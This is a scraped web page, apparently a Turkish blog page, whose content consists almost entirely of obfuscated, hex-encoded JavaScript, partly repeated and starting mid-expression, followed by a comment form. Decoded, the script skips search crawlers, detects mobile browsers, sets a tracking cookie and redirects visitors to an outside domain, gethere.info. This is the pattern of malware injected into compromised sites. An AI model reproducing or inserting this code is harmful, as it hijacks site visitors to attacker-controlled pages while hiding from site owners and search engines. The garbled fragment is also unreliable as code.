|\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

CEVAP VER

Please enter your comment!
Please enter your name here